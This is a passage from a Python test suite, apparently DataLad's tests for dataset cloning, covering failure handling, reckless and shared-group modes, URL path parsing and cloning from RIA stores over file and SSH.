dataset, when cloning fails (gh-6138)\n create_tree(ds.path, {'subdir': {'dummy2.txt': 'whatever'}})\n assert_repo_status(ds.path,\n untracked=[str(ds.pathobj / 'subdir'),\n 'dummy.txt'])\n hexsha_before = ds.repo.get_hexsha(DEFAULT_BRANCH)\n results = ds.clone(source, \"subdir\",\n result_xfm=None,\n return_type='list',\n on_failure='ignore')\n assert_in_results(results, status='error')\n # status unchanged\n assert_repo_status(ds.path,\n untracked=[str(ds.pathobj / 'subdir'),\n 'dummy.txt'])\n # nothing was committed\n eq_(hexsha_before, ds.repo.get_hexsha(DEFAULT_BRANCH))\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_notclone_known_subdataset(src_path=None, path=None):\n src = Dataset(src_path).create()\n sub = src.create('subm 1')\n sub_id = sub.id\n # get the superdataset:\n ds = clone(src, path,\n result_xfm='datasets', return_type='item-or-list')\n\n # subdataset not installed:\n subds = Dataset(ds.pathobj / 'subm 1')\n assert_false(subds.is_installed())\n assert_in('subm 1', ds.subdatasets(state='absent', result_xfm='relpaths'))\n assert_not_in('subm 1', ds.subdatasets(state='present', result_xfm='relpaths'))\n # clone is not meaningful\n res = ds.clone('subm 1', on_failure='ignore', result_xfm=None)\n assert_status('error', res)\n assert_message(\"Failed to clone from any candidate source URL. \"\n \"Encountered errors per each url were:\\n- %s\",\n res)\n # get does the job\n res = ds.get(path='subm 1', get_data=False)\n assert_status('ok', res)\n ok_(subds.is_installed())\n ok_(AnnexRepo.is_valid_repo(subds.path, allow_noninitialized=False))\n # Verify that it is the correct submodule installed and not\n # new repository initiated\n eq_(subds.id, sub_id)\n assert_not_in('subm 1', ds.subdatasets(state='absent', result_xfm='relpaths'))\n assert_in('subm 1', ds.subdatasets(state='present', result_xfm='relpaths'))\n\n\n@with_tempfile(mkdir=True)\ndef test_failed_clone(dspath=None):\n ds = create(dspath)\n res = ds.clone(\"http://nonexistingreallyanything.datalad.org/bla\", \"sub\",\n on_failure='ignore', result_xfm=None)\n assert_status('error', res)\n assert_message(\"Failed to clone from any candidate source URL. \"\n \"Encountered errors per each url were:\\n- %s\",\n res)\n\n\n@with_tree(tree={\n 'ds': {'test.txt': 'some'},\n })\n@with_tempfile\ndef test_clone_missing_commit(source=None, clone=None):\n\n from datalad.core.distributed.clone import clone_dataset\n\n source = Path(source)\n clone = Path(clone)\n\n # Commit SHA from another repository - should never be recreated in a fresh\n # dataset:\n commit_sha = \"c29691b37b05b78ffa76e5fdf0044e9df673e8f1\"\n\n origin = Dataset(source).create(force=True)\n origin.save()\n\n # clone origin but request commit_sha to be checked out:\n\n results = [x for x in\n clone_dataset(srcs=[source], destds=Dataset(clone),\n checkout_gitsha=commit_sha)\n ]\n # expected error result:\n assert_result_count(results, 1)\n assert_in_results(results, status='error', action='install',\n path=str(clone), type='dataset')\n assert_in(\"Target commit c29691b3 does not exist in the clone\",\n results[0]['message'])\n # failed attempt was removed:\n assert_false(clone.exists())\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef check_reckless(annex, src_path, top_path, sharedpath):\n # super with or without annex\n src = Dataset(src_path).create(annex=annex)\n # sub always with annex\n srcsub = src.create('sub')\n\n # and for the actual test\n ds = clone(src.path, top_path, reckless=True,\n result_xfm='datasets', return_type='item-or-list')\n\n is_crippled = srcsub.repo.is_managed_branch()\n\n if annex and not is_crippled:\n eq_(ds.config.get('annex.hardlink', None), 'true')\n\n # actual value is 'auto', because True is a legacy value and we map it\n eq_(ds.config.get('datalad.clone.reckless', None), 'auto')\n if annex:\n eq_(ds.repo.repo_info()['untrusted repositories'][0]['here'], True)\n # now, if we clone another repo into this one, it will inherit the setting\n # without having to provide it explicitly\n newsub = ds.clone(srcsub, 'newsub', result_xfm='datasets', return_type='item-or-list')\n # and `get` the original subdataset\n origsub = ds.get('sub', result_xfm='datasets', return_type='item-or-list')\n for sds in (newsub, origsub):\n eq_(sds.config.get('datalad.clone.reckless', None), 'auto')\n if not is_crippled:\n eq_(sds.config.get('annex.hardlink', None), 'true')\n\n if is_crippled:\n raise SkipTest(\"Remainder of test needs proper filesystem permissions\")\n\n if annex:\n if ds.repo.git_annex_version < \"8.20200908\":\n # TODO: Drop when GIT_ANNEX_MIN_VERSION is at least 8.20200908.\n\n # the standard setup keeps the annex locks accessible to the user only\n nok_((ds.pathobj / '.git' / 'annex' / 'index.lck').stat().st_mode \\\n & stat.S_IWGRP)\n else:\n # umask might be such (e.g. 002) that group write permissions are inherited, so\n # for the next test we should check if that is the case on some sample file\n dltmp_path = ds.pathobj / '.git' / \"dltmp\"\n dltmp_path.write_text('')\n default_grp_write_perms = dltmp_path.stat().st_mode & stat.S_IWGRP\n dltmp_path.unlink()\n # the standard setup keeps the annex locks following umask inheritance\n eq_((ds.pathobj / '.git' / 'annex' / 'index.lck').stat().st_mode \\\n & stat.S_IWGRP, default_grp_write_perms)\n\n # but we can set it up for group-shared access too\n sharedds = clone(\n src, sharedpath,\n reckless='shared-group',\n result_xfm='datasets',\n return_type='item-or-list')\n ok_((sharedds.pathobj / '.git' / 'annex' / 'index.lck').stat().st_mode \\\n & stat.S_IWGRP)\n\n\[email protected]('reckless', [True, False])\ndef test_reckless(reckless):\n check_reckless(reckless)\n\n\n@with_tempfile\n@with_tempfile\ndef test_install_source_relpath(src=None, dest=None):\n src = Path(src)\n create(src)\n src_ = src.name\n with chpwd(src.parent):\n clone(src_, dest)\n\n\n@with_tempfile\n@with_tempfile\ndef test_clone_isnt_a_smartass(origin_path=None, path=None):\n origin = create(origin_path)\n cloned = clone(origin, path,\n result_xfm='datasets', return_type='item-or-list')\n with chpwd(path):\n # no were are inside a dataset clone, and we make another one\n # we do not want automatic subdatasetification without given a dataset\n # explicitly\n clonedsub = clone(origin, 'testsub',\n result_xfm='datasets', return_type='item-or-list')\n # correct destination\n assert clonedsub.path.startswith(path)\n # no subdataset relation\n eq_(cloned.subdatasets(), [])\n\n\n@with_tempfile(mkdir=True)\ndef test_clone_report_permission_issue(tdir=None):\n pdir = Path(tdir) / 'protected'\n pdir.mkdir()\n # make it read-only\n pdir.chmod(0o555)\n with chpwd(pdir):\n # first check the premise of the test. If we can write (strangely\n # mounted/crippled file system, subsequent assumptions are violated\n # and we can stop\n probe = Path('probe')\n try:\n probe.write_text('should not work')\n raise SkipTest\n except PermissionError:\n # we are indeed in a read-only situation\n pass\n res = clone('///', result_xfm=None, return_type='list', on_failure='ignore')\n assert_status('error', res)\n assert_result_count(\n res, 1, status='error',\n message=\"could not create work tree dir '%s/%s': Permission denied\"\n % (pdir, get_datasets_topdir())\n )\n\n\n@skip_if_no_network\n@with_tempfile\ndef test_autoenabled_remote_msg(path=None):\n # Verify that no message about a remote not been enabled is displayed\n # whenever the remote we clone is the type=git special remote, so the name\n # of the remote might not match\n with swallow_logs(new_level=logging.INFO) as cml:\n res = clone('///repronim/containers', path, result_xfm=None, return_type='list')\n assert_status('ok', res)\n assert_not_in(\"not auto-enabled\", cml.out)\n\n\n@with_sameas_remote(autoenabled=True)\n@with_tempfile(mkdir=True)\ndef test_clone_autoenable_msg_handles_sameas(repo=None, clone_path=None):\n ds = Dataset(repo.path)\n with swallow_logs(new_level=logging.INFO) as cml:\n res = clone(ds, clone_path, result_xfm=None, return_type='list')\n assert_status('ok', res)\n assert_in(\"r_dir\", cml.out)\n assert_in(\"not auto-enabled\", cml.out)\n # The rsyncurl remote was enabled.\n assert_not_in(\"r_rsync\", cml.out)\n ds_cloned = Dataset(clone_path)\n remotes = ds_cloned.repo.get_remotes()\n assert_in(\"r_rsync\", remotes)\n assert_not_in(\"r_dir\", remotes)\n\n\ndef test_installationpath_from_url():\n # cases for all OSes\n cases = [\n 'http://example.com/lastbit',\n 'http://example.com/lastbit.git',\n 'http://lastbit:8000',\n # SSH\n 'hostname:lastbit',\n 'hostname:lastbit/',\n 'hostname:subd/lastbit',\n 'hostname:/full/path/lastbit',\n 'hostname:lastbit/.git',\n 'hostname:lastbit/.git/',\n 'hostname:/full/path/lastbit/.git',\n 'full.hostname.com:lastbit/.git',\n '[email protected]:lastbit/.git',\n 'ssh://user:[email protected]/full/path/lastbit',\n 'ssh://user:[email protected]/full/path/lastbit/',\n 'ssh://user:[email protected]/full/path/lastbit/.git',\n ]\n # OS specific cases\n cases += [\n 'C:\\\\Users\\\\mih\\\\AppData\\\\Local\\\\Temp\\\\lastbit',\n 'C:\\\\Users\\\\mih\\\\AppData\\\\Local\\\\Temp\\\\lastbit\\\\',\n 'Temp\\\\lastbit',\n 'Temp\\\\lastbit\\\\',\n 'lastbit.git',\n 'lastbit.git\\\\',\n ] if on_windows else [\n 'lastbit',\n 'lastbit/',\n '/lastbit',\n 'lastbit.git',\n 'lastbit.git/',\n ]\n\n for p in cases:\n eq_(_get_installationpath_from_url(p), 'lastbit')\n # we need to deal with quoted urls\n for url in (\n # although some docs say that space could've been replaced with +\n 'http://localhost:8000/+last%20bit',\n 'http://localhost:8000/%2Blast%20bit',\n '///%2Blast%20bit',\n '///d1/%2Blast%20bit',\n '///d1/+last bit',\n ):\n eq_(_get_installationpath_from_url(url), '+last bit')\n # and the hostname alone\n eq_(_get_installationpath_from_url(\"http://hostname\"), 'hostname')\n eq_(_get_installationpath_from_url(\"http://hostname/\"), 'hostname')\n\n\n# https://github.com/datalad/datalad/issues/3958\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_expanduser(srcpath=None, destpath=None):\n src = Dataset(Path(srcpath) / 'src').create()\n dest = Dataset(Path(destpath) / 'dest').create()\n\n # We switch away from home set up in datalad.setup_package(), so make sure\n # we have a valid identity.\n with open(op.join(srcpath, \".gitconfig\"), \"w\") as fh:\n fh.write(\"[user]\\n\"\n \"name = DataLad oooooTester\\n\"\n \"email = [email protected]\\n\")\n\n with chpwd(destpath), patch.dict('os.environ', get_home_envvars(srcpath)):\n res = clone(op.join('~', 'src'), 'dest', result_xfm=None, return_type='list',\n on_failure='ignore')\n assert_result_count(res, 1)\n assert_result_count(\n res, 1, action='install', status='error', path=dest.path,\n message='target path already exists and not empty, refuse to '\n 'clone into target path')\n # wipe out destination, and try again\n assert_status('ok', remove(dataset=dest, reckless='kill'))\n # now it should do it, and clone the right one\n cloneds = clone(op.join('~', 'src'), 'dest')\n eq_(cloneds.pathobj, Path(destpath) / 'dest')\n eq_(src.id, cloneds.id)\n # and it shouldn't fail when doing it again, because it detects\n # the re-clone\n cloneds = clone(op.join('~', 'src'), 'dest')\n eq_(cloneds.pathobj, Path(destpath) / 'dest')\n\n\n@with_tempfile(mkdir=True)\ndef test_cfg_originorigin(path=None):\n path = Path(path)\n origin = Dataset(path / 'origin').create()\n (origin.pathobj / 'file1.txt').write_text('content')\n origin.save()\n clone_lev1 = clone(origin, path / 'clone_lev1')\n clone_lev2 = clone(clone_lev1, path / 'clone_lev2')\n # the goal is to be able to get file content from origin without\n # the need to configure it manually\n assert_result_count(\n clone_lev2.get('file1.txt', on_failure='ignore'),\n 1,\n action='get',\n status='ok',\n path=str(clone_lev2.pathobj / 'file1.txt'),\n )\n eq_((clone_lev2.pathobj / 'file1.txt').read_text(), 'content')\n eq_(\n Path(clone_lev2.siblings(\n 'query',\n name=DEFAULT_REMOTE + '-2',\n return_type='item-or-list')['url']),\n origin.pathobj\n )\n\n # Clone another level, this time with a relative path. Drop content from\n # lev2 so that origin is the only place that the file is available from.\n clone_lev2.drop(\"file1.txt\")\n with chpwd(path), swallow_logs(new_level=logging.DEBUG) as cml:\n clone_lev3 = clone('clone_lev2', 'clone_lev3')\n # we called git-annex-init; see gh-4367:\n cml.assert_logged(msg=r\"[^[]*Run \\[('git',.*'annex'|'git-annex'), 'init'\",\n match=False,\n level='DEBUG')\n assert_result_count(\n clone_lev3.get('file1.txt', on_failure='ignore'),\n 1,\n action='get',\n status='ok',\n path=str(clone_lev3.pathobj / 'file1.txt'))\n\n\n# test fix for gh-2601/gh-3538\n@with_tempfile()\ndef test_relative_submodule_url(path=None):\n Dataset(op.join(path, 'origin')).create()\n ds = Dataset(op.join(path, 'ds')).create()\n with chpwd(ds.path):\n ds_cloned = ds.clone(\n source=op.join(op.pardir, 'origin'),\n path='sources')\n\n # Check that a simple fetch call does not fail.\n ds_cloned.repo.fetch()\n\n subinfo = ds.subdatasets(return_type='item-or-list')\n eq_(subinfo['gitmodule_url'],\n # must be a relative URL, not platform-specific relpath!\n '../../origin')\n\n\n@with_tree(tree={\"subdir\": {}})\n@with_tempfile(mkdir=True)\ndef test_local_url_with_fetch(path=None, path_other=None):\n path = Path(path)\n path_other = Path(path_other)\n Dataset(path / \"source\").create()\n\n for where, source, path in [\n (path, \"source\", \"a\"),\n (path / \"subdir\", op.join(op.pardir, \"source\"), \"a\"),\n (path, \"source\", path_other / \"a\")]:\n with chpwd(where):\n ds_cloned = clone(source=source, path=path)\n # Perform a fetch to check that the URL points to a valid location.\n ds_cloned.repo.fetch()\n\n\ndef test_decode_source_spec():\n # resolves datalad RIs:\n eq_(decode_source_spec('///subds'),\n dict(source='///subds', giturl=consts.DATASETS_TOPURL + 'subds', version=None,\n type='dataladri', default_destpath='subds'))\n assert_raises(NotImplementedError, decode_source_spec,\n '//custom/subds')\n\n # doesn't harm others:\n for url in (\n 'http://example.com',\n '/absolute/path',\n 'file://localhost/some',\n 'localhost/another/path',\n '[email protected]/mydir',\n 'ssh://somewhe.re/else',\n 'https://github.com/datalad/testrepo--basic--r1',\n ):\n props = decode_source_spec(url)\n dest = props.pop('default_destpath')\n eq_(props, dict(source=url, version=None, giturl=url, type='giturl'))\n\n # RIA URIs with and without version specification\n dsid = '6d69ca68-7e85-11e6-904c-002590f97d84'\n for proto, loc, version in (\n ('http', 'example.com', None),\n ('http', 'example.com', 'v1.0'),\n ('http', 'example.com', 'some_with@in_it'),\n ('ssh', 'example.com', 'some_with@in_it'),\n ):\n spec = 'ria+{}://{}{}{}'.format(\n proto,\n loc,\n '#{}'.format(dsid),\n '@{}'.format(version) if version else '')\n eq_(decode_source_spec(spec),\n dict(\n source=spec,\n giturl='{}://{}/{}/{}'.format(\n proto,\n loc,\n dsid[:3],\n dsid[3:]),\n version=version,\n default_destpath=dsid,\n type='ria')\n )\n # not a dataset UUID\n assert_raises(ValueError, decode_source_spec, 'ria+http://example.com#123')\n\n # literal dataset name/location\n eq_(decode_source_spec('ria+http://example.com#~rootds'),\n {'source': 'ria+http://example.com#~rootds',\n 'version': None, 'type': 'ria',\n 'giturl': 'http://example.com/alias/rootds',\n 'default_destpath': 'rootds'})\n # version etc still works\n eq_(decode_source_spec('ria+http://example.com#~rootds@specialbranch'),\n {'source': 'ria+http://example.com#~rootds@specialbranch',\n 'version': 'specialbranch', 'type': 'ria',\n 'giturl': 'http://example.com/alias/rootds',\n 'default_destpath': 'rootds'})\n\n\ndef _move2store(storepath, d):\n # make a bare clone of it into a local that matches the organization\n # of a ria dataset store\n store_loc = str(storepath / d.id[:3] / d.id[3:])\n d.repo.call_git(['clone', '--bare', d.path, store_loc])\n d.siblings('configure', name='store', url=str(store_loc),\n result_renderer='disabled')\n Runner(cwd=store_loc).run(['git', 'update-server-info'])\n\n\n@slow # 12sec on Yarik's laptop\n@with_tree(tree={\n 'ds': {\n 'test.txt': 'some',\n 'subdir': {\n 'subds': {'testsub.txt': 'somemore'},\n },\n },\n})\n@with_tempfile(mkdir=True)\n@serve_path_via_http\ndef test_ria_http(lcl=None, storepath=None, url=None):\n # create a local dataset with a subdataset\n lcl = Path(lcl)\n storepath = Path(storepath)\n subds = Dataset(lcl / 'ds' / 'subdir' / 'subds').create(force=True)\n subds.save()\n ds = Dataset(lcl / 'ds').create(force=True)\n ds.save(version_tag='original')\n assert_repo_status(ds.path)\n for d in (ds, subds):\n _move2store(storepath, d)\n # location of superds in store\n storeds_loc = str(storepath / ds.id[:3] / ds.id[3:])\n # now we should be able to clone from a ria+http url\n # the super\n riaclone = clone(\n 'ria+{}#{}'.format(url, ds.id),\n lcl / 'clone',\n )\n\n # due to default configuration, clone() should automatically look for the\n # subdataset in the store, too -- if not the following would fail, because\n # we never configured a proper submodule URL\n riaclonesub = riaclone.get(\n op.join('subdir', 'subds'), get_data=False,\n result_xfm='datasets', return_type='item-or-list')\n\n # both datasets came from the store and must be set up in an identical\n # fashion\n for origds, cloneds in ((ds, riaclone), (subds, riaclonesub)):\n eq_(origds.id, cloneds.id)\n if not ds.repo.is_managed_branch():\n # test logic cannot handle adjusted branches\n eq_(origds.repo.get_hexsha(), cloneds.repo.get_hexsha())\n ok_(cloneds.config.get(f'remote.{DEFAULT_REMOTE}.url').startswith(url))\n eq_(cloneds.config.get(f'remote.{DEFAULT_REMOTE}.annex-ignore'), 'true')\n eq_(cloneds.config.get('datalad.get.subdataset-source-candidate-200origin'),\n 'ria+%s#{id}' % url)\n\n # now advance the source dataset\n (ds.pathobj / 'newfile.txt').write_text('new')\n ds.save()\n ds.push(to='store')\n Runner(cwd=storeds_loc).run(['git', 'update-server-info'])\n # re-clone as before\n riaclone2 = clone(\n 'ria+{}#{}'.format(url, ds.id),\n lcl / 'clone2',\n )\n # and now clone a specific version, here given be the tag name\n riaclone_orig = clone(\n 'ria+{}#{}@{}'.format(url, ds.id, 'original'),\n lcl / 'clone_orig',\n )\n if not ds.repo.is_managed_branch():\n # test logic cannot handle adjusted branches\n # we got the precise version we wanted\n eq_(riaclone.repo.get_hexsha(), riaclone_orig.repo.get_hexsha())\n # and not the latest\n eq_(riaclone2.repo.get_hexsha(), ds.repo.get_hexsha())\n neq_(riaclone2.repo.get_hexsha(), riaclone_orig.repo.get_hexsha())\n\n # attempt to clone a version that doesn't exist\n with swallow_logs():\n with assert_raises(IncompleteResultsError) as cme:\n clone('ria+{}#{}@impossible'.format(url, ds.id),\n lcl / 'clone_failed')\n assert_in(\"not found in upstream\", str(cme.value))\n\n # lastly test if URL rewriting is in effect\n # on the surface we clone from an SSH source identified by some custom\n # label, no full URL, but URL rewriting setup maps it back to the\n # HTTP URL used above\n with patch_config({\n 'url.ria+{}#.insteadof'.format(url): 'ria+ssh://somelabel#'}):\n cloned_by_label = clone(\n 'ria+ssh://somelabel#{}'.format(origds.id),\n lcl / 'cloned_by_label',\n )\n # so we get the same setup as above, but....\n eq_(origds.id, cloned_by_label.id)\n if not ds.repo.is_managed_branch():\n # test logic cannot handle adjusted branches\n eq_(origds.repo.get_hexsha(), cloned_by_label.repo.get_hexsha())\n ok_(cloned_by_label.config.get(\n f'remote.{DEFAULT_REMOTE}.url').startswith(url))\n eq_(cloned_by_label.config.get(f'remote.{DEFAULT_REMOTE}.annex-ignore'),\n 'true')\n # ... the clone candidates go with the label-based URL such that\n # future get() requests acknowledge a (system-wide) configuration\n # update\n eq_(cloned_by_label.config.get('datalad.get.subdataset-source-candidate-200origin'),\n 'ria+ssh://somelabel#{id}')\n\n if not has_symlink_capability():\n return\n # place a symlink in the store to serve as a dataset alias\n (storepath / 'alias').mkdir()\n (storepath / 'alias' / 'myname').symlink_to(storeds_loc)\n with chpwd(lcl):\n cloned_by_alias = clone('ria+{}#~{}'.format(url, 'myname'))\n # still get the same data\n eq_(cloned_by_alias.id, ds.id)\n # more sensible default install path\n eq_(cloned_by_alias.pathobj.name, 'myname')\n\n\n@with_tempfile\n@with_tempfile\ndef _test_ria_postclonecfg(url, dsid, clone_path, superds):\n # Test cloning from RIA store while ORA special remote autoenabling failed\n # due to an invalid URL from the POV of the cloner.\n # Origin's git-config-file should contain the UUID to enable. This needs to\n # work via HTTP, SSH and local cloning.\n\n # Autoenabling should fail initially by git-annex-init and we would report\n # on INFO level. Only postclone routine would deal with it.\n with swallow_logs(new_level=logging.INFO) as cml:\n # First, the super ds:\n riaclone = clone('ria+{}#{}'.format(url, dsid), clone_path)\n cml.assert_logged(msg=\"access to 1 dataset sibling store-storage not \"\n \"auto-enabled\",\n level=\"INFO\",\n regex=False)\n\n # However, we now can retrieve content since clone should have enabled the\n # special remote with new URL (or origin in case of HTTP).\n res = riaclone.get('test.txt')\n assert_result_count(res, 1,\n status='ok',\n path=str(riaclone.pathobj / 'test.txt'),\n message=\"from {}...\".format(DEFAULT_REMOTE\n if url.startswith('http')\n else \"store-storage\"))\n\n # Second ORA remote is enabled and not reconfigured:\n untouched_remote = riaclone.siblings(name='anotherstore-storage',\n return_type='item-or-list')\n assert_not_is_instance(untouched_remote, list)\n untouched_url = riaclone.repo.get_special_remotes()[\n untouched_remote['annex-uuid']]['url']\n ok_(untouched_url.startswith(\"ria+file://\"))\n ok_(not untouched_url.startswith(\"ria+{}\".format(url)))\n\n # publication dependency was set for store-storage but not for\n # anotherstore-storage:\n eq_(riaclone.config.get(f\"remote.{DEFAULT_REMOTE}.datalad-publish-depends\",\n get_all=True),\n \"store-storage\")\n\n # same thing for the sub ds (we don't need a store-url and id - get should\n # figure those itself):\n with swallow_logs(new_level=logging.INFO) as cml:\n riaclonesub = riaclone.get(\n op.join('subdir', 'subds'), get_data=False,\n result_xfm='datasets', return_type='item-or-list')\n cml.assert_logged(msg=\"access to 1 dataset sibling store-storage not \"\n \"auto-enabled\",\n level=\"INFO\",\n regex=False)\n res = riaclonesub.get('testsub.txt')\n assert_result_count(res, 1,\n status='ok',\n path=str(riaclonesub.pathobj / 'testsub.txt'),\n message=\"from {}...\".format(DEFAULT_REMOTE\n if url.startswith('http')\n else \"store-storage\"))\n\n # publication dependency was set for store-storage but not for\n # anotherstore-storage:\n eq_(riaclonesub.config.get(f\"remote.{DEFAULT_REMOTE}.datalad-publish-depends\",\n get_all=True),\n \"store-storage\")\n\n # finally get the plain git subdataset.\n # Clone should figure to also clone it from a ria+ URL\n # (subdataset-source-candidate), notice that there wasn't an autoenabled ORA\n # remote, but shouldn't stumble upon it, since it's a plain git.\n res = riaclone.get(op.join('subdir', 'subgit', 'testgit.txt'))\n assert_result_count(res, 1, status='ok', type='dataset', action='install')\n assert_result_count(res, 1, status='notneeded', type='file')\n assert_result_count(res, 2)\n # no ORA remote, no publication dependency:\n riaclonesubgit = Dataset(riaclone.pathobj / 'subdir' / 'subgit')\n eq_(riaclonesubgit.config.get(f\"remote.{DEFAULT_REMOTE}.datalad-publish-depends\",\n get_all=True),\n None)\n\n # Now, test that if cloning into a dataset, ria-URL is preserved and\n # post-clone configuration is triggered again, when we remove the subds and\n # retrieve it again via `get`:\n ds = Dataset(superds).create()\n ria_url = 'ria+{}#{}'.format(url, dsid)\n ds.clone(ria_url, 'sub')\n sds = ds.subdatasets('sub')\n eq_(len(sds), 1)\n eq_(sds[0]['gitmodule_datalad-url'], ria_url)\n assert_repo_status(ds.path)\n ds.drop('sub', what='all', reckless='kill', recursive=True)\n assert_repo_status(ds.path)\n\n # .gitmodules still there:\n sds = ds.subdatasets('sub')\n eq_(len(sds), 1)\n eq_(sds[0]['gitmodule_datalad-url'], ria_url)\n # get it again:\n\n # Autoenabling should fail initially by git-annex-init and we would report\n # on INFO level. Only postclone routine would deal with it.\n with swallow_logs(new_level=logging.INFO) as cml:\n ds.get('sub', get_data=False)\n cml.assert_logged(msg=\"access to 1 dataset sibling store-storage not \"\n \"auto-enabled\",\n level=\"INFO\",\n regex=False)\n\n subds = Dataset(ds.pathobj / 'sub')\n # special remote is fine:\n res = subds.get('test.txt')\n assert_result_count(res, 1,\n status='ok',\n path=str(subds.pathobj / 'test.txt'),\n message=\"from {}...\".format(DEFAULT_REMOTE\n if url.startswith('http')\n else \"store-storage\"))\n\n\n@with_tempfile\ndef _postclonetest_prepare(lcl, storepath, storepath2, link):\n\n from datalad.customremotes.ria_utils import (\n create_ds_in_store,\n create_store,\n get_layout_locations,\n )\n from datalad.distributed.ora_remote import LocalIO\n\n create_tree(lcl,\n tree={\n 'ds': {\n 'test.txt': 'some',\n 'subdir': {\n 'subds': {'testsub.txt': 'somemore'},\n 'subgit': {'testgit.txt': 'even more'}\n },\n },\n })\n\n lcl = Path(lcl)\n storepath = Path(storepath)\n storepath2 = Path(storepath2)\n link = Path(link)\n link.symlink_to(storepath)\n\n # create a local dataset with a subdataset\n subds = Dataset(lcl / 'ds' / 'subdir' / 'subds').create(force=True)\n subds.save()\n # add a plain git dataset as well\n subgit = Dataset(lcl / 'ds' / 'subdir' / 'subgit').create(force=True,\n annex=False)\n subgit.save()\n ds = Dataset(lcl / 'ds').create(force=True)\n ds.save(version_tag='original')\n assert_repo_status(ds.path)\n\n io = LocalIO()\n\n # Have a second store with valid ORA remote. This should not interfere with\n # reconfiguration of the first one, when that second store is not the one we\n # clone from. However, don't push data into it for easier get-based testing\n # later on.\n # Doing this first, so datasets in \"first\"/primary store know about this.\n create_store(io, storepath2, '1')\n url2 = \"ria+{}\".format(get_local_file_url(str(storepath2)))\n for d in (ds, subds, subgit):\n create_ds_in_store(io, storepath2, d.id, '2', '1')\n d.create_sibling_ria(url2, \"anotherstore\", new_store_ok=True)\n d.push('.', to='anotherstore', data='nothing')\n store2_loc, _, _ = get_layout_locations(1, storepath2, d.id)\n Runner(cwd=str(store2_loc)).run(['git', 'update-server-info'])\n\n # Now the store to clone from:\n create_store(io, storepath, '1')\n\n # URL to use for upload. Point is, that this should be invalid for the clone\n # so that autoenable would fail. Therefore let it be based on a to be\n # deleted symlink\n upl_url = \"ria+{}\".format(get_local_file_url(str(link)))\n\n for d in (ds, subds, subgit):\n\n # TODO: create-sibling-ria required for config! => adapt to RF'd\n # creation (missed on rebase?)\n create_ds_in_store(io, storepath, d.id, '2', '1')\n d.create_sibling_ria(upl_url, \"store\", new_store_ok=True)\n\n if d is not subgit:\n # Now, simulate the problem by reconfiguring the special remote to\n # not be autoenabled.\n # Note, however, that the actual intention is a URL, that isn't\n # valid from the point of view of the clone (doesn't resolve, no\n # credentials, etc.) and therefore autoenabling on git-annex-init\n # when datalad-cloning would fail to succeed.\n Runner(cwd=d.path).run(['git', 'annex', 'enableremote',\n 'store-storage',\n 'autoenable=false'])\n d.push('.', to='store')\n store_loc, _, _ = get_layout_locations(1, storepath, d.id)\n Runner(cwd=str(store_loc)).run(['git', 'update-server-info'])\n\n link.unlink()\n # We should now have a store with datasets that have an autoenabled ORA\n # remote relying on an inaccessible URL.\n # datalad-clone is supposed to reconfigure based on the URL we cloned from.\n # Test this feature for cloning via HTTP, SSH and FILE URLs.\n\n return ds.id\n\n\n# TODO?: make parametric again on _test_ria_postclonecfg\n@known_failure_windows # https://github.com/datalad/datalad/issues/5134\n@slow # 14 sec on travis\ndef test_ria_postclonecfg():\n\n if not has_symlink_capability():\n # This is needed to create an ORA remote using an URL for upload,\n # that is then invalidated later on (delete the symlink it's based on).\n raise SkipTest(\"Can't create symlinks\")\n\n from datalad.utils import make_tempfile\n\n with make_tempfile(mkdir=True) as lcl, make_tempfile(mkdir=True) as store, \\\n make_tempfile(mkdir=True) as store2:\n id = _postclonetest_prepare(lcl, store, store2)\n\n # test cloning via ria+file://\n _test_ria_postclonecfg(\n get_local_file_url(store, compatibility='git'), id\n )\n\n # Note: HTTP disabled for now. Requires proper implementation in ORA\n # remote. See\n # https://github.com/datalad/datalad/pull/4203#discussion_r410284649\n\n # # test cloning via ria+http://\n # with HTTPPath(store) as url:\n # yield _test_ria_postclonecfg, url, id\n\n # test cloning via ria+ssh://\n skip_ssh(_test_ria_postclonecfg)(\n \"ssh://datalad-test:{}\".format(Path(store).as_posix()), id\n )\n\n\n@known_failure_windows\n@skip_ssh\n@with_tree(tree={'somefile.txt': 'some content'})\n@with_tempfile\n@with_tempfile\ndef test_no_ria_postclonecfg(dspath=None, storepath=None, clonepath=None):\n\n dspath = Path(dspath)\n storepath = Path(storepath)\n clonepath = Path(clonepath)\n\n # Test that particular configuration(s) do NOT lead to a reconfiguration\n # upon clone. (See gh-5628)\n\n from datalad.customremotes.ria_utils import create_store\n from datalad.distributed.ora_remote import LocalIO\n\n ds = Dataset(dspath).create(force=True)\n ds.save()\n assert_repo_status(ds.path)\n\n io = LocalIO()\n create_store(io, storepath, '1')\n file_url = \"ria+{}\".format(get_local_file_url(str(storepath)))\n ssh_url = \"ria+ssh://datalad-test:{}\".format(storepath.as_posix())\n ds.create_sibling_ria(file_url, \"teststore\",\n push_url=ssh_url, alias=\"testds\",\n new_store_ok=True)\n ds.push('.', to='teststore')\n\n # Now clone via SSH. Should not reconfigure although `url` doesn't match the\n # URL we cloned from. However, `push-url` does.\n riaclone = clone('{}#{}'.format(ssh_url, ds.id), clonepath)\n\n # ORA remote is enabled (since URL still valid) but not reconfigured:\n untouched_remote = riaclone.siblings(name='teststore-storage',\n return_type='item-or-list')\n assert_not_is_instance(untouched_remote, list)\n ora_cfg = riaclone.repo.get_special_remotes()[\n untouched_remote['annex-uuid']]\n ok_(ora_cfg['url'] == file_url)\n ok_(ora_cfg['push-url'] == ssh_url)\n\n # publication dependency was still set (and it's the only one that was set):\n eq_(riaclone.config.get(f\"remote.{DEFAULT_REMOTE}.datalad-publish-depends\",\n get_all=True),\n \"teststore-storage\")\n\n # we can still get the content\n ds.get(\"somefile.txt\")\n\n\n# fatal: Could not read from remote repository.\n@known_failure_githubci_win # in datalad/git-annex as e.g. of 20201218\n@with_tempfile(mkdir=True)\n@with_tempfile\n@with_tempfile\ndef test_ria_postclone_noannex(dspath=None, storepath=None, clonepath=None):\n\n # Test for gh-5186: Cloning from local FS, shouldn't lead to annex\n # initializing origin.\n\n dspath = Path(dspath)\n storepath = Path(storepath)\n clonepath = Path(clonepath)\n\n from datalad.customremotes.ria_utils import (\n create_ds_in_store,\n create_store,\n get_layout_locations,\n )\n from datalad.distributed.ora_remote import LocalIO\n\n # First create a dataset in a RIA store the standard way\n somefile = dspath / 'a_file.txt'\n somefile.write_text('irrelevant')\n ds = Dataset(dspath).create(force=True)\n\n io = 